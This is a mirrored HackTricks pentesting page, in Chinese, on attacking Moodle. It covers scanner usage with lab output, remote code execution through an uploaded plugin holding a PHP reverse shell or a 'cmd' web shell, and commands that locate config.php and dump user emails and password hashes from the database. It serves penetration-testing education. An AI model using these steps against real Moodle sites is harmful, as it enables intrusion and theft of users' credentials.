Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 21:24:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/moodle.md

135 lines
6.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Moodle
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
如果您对**黑客职业**感兴趣并想要攻破不可攻破的系统 - **我们正在招聘!**(需要流利的波兰语书面和口头表达能力)。
{% embed url="https://www.stmcyber.com/careers" %}
## 自动扫描
### droopescan
```bash
pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/
[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php
[+] No themes found.
[+] Possible version(s):
3.10.0-beta
[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/
[+] Scan finished (0:00:05.643539 elapsed)
```
### moodlescan
moodlescan is a Python script designed to perform comprehensive scans for Moodle installations. It can discover Moodle installations by brute-forcing URLs and checking for specific Moodle files. The tool can also enumerate users and courses, making it a valuable asset for penetration testers assessing Moodle instances.
```bash
#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/
Version 0.7 - Dic/2020
.............................................................................................................
By Victor Herrera - supported by www.incode.cl
.............................................................................................................
Getting server information http://moodle.schooled.htb/moodle/ ...
server : Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by : PHP/7.4.15
x-frame-options : sameorigin
last-modified : Wed, 07 Apr 2021 21:33:41 GMT
Getting moodle version...
Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta
Searching vulnerabilities...
Vulnerabilities found: 0
Scan completed.
```
### CMSMap
### CMSMap
```bash
pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>
```
### CVEs
我发现自动工具在发现影响 Moodle 版本的漏洞方面相当无用。您可以在 [https://snyk.io/vuln/composer:moodle%2Fmoodle](https://snyk.io/vuln/composer:moodle%2Fmoodle) 进行检查。
## **RCE**
您需要具有**管理员**角色,可以在**“站点管理”**选项卡内安装插件:
![](<../../.gitbook/assets/image (447).png>)
即使您是管理员,您可能仍然需要**激活此选项**。您可以查看 Moodle 特权升级 PoC 中的操作:[https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321)。
然后,您可以**安装以下插件**,其中包含经典的 pentest-monkey php 反弹 shell_在上传之前您需要解压缩它更改 revshell 的 IP 和端口然后再次压缩_
{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}
或者您可以使用来自 [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) 的插件使用“cmd”参数获取常规 PHP shell。
要访问启动恶意插件,您需要访问:
```bash
http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
```
## POST
### 查找数据库凭据
```bash
find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
```
### 从数据库中转储凭据
```bash
/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
```
<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
如果您对**黑客职业**感兴趣并想要攻破不可能的 - **我们正在招聘!**_需要流利的波兰语书面和口语_
{% embed url="https://www.stmcyber.com/careers" %}
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
Reference in a new issue View git blame Copy permalink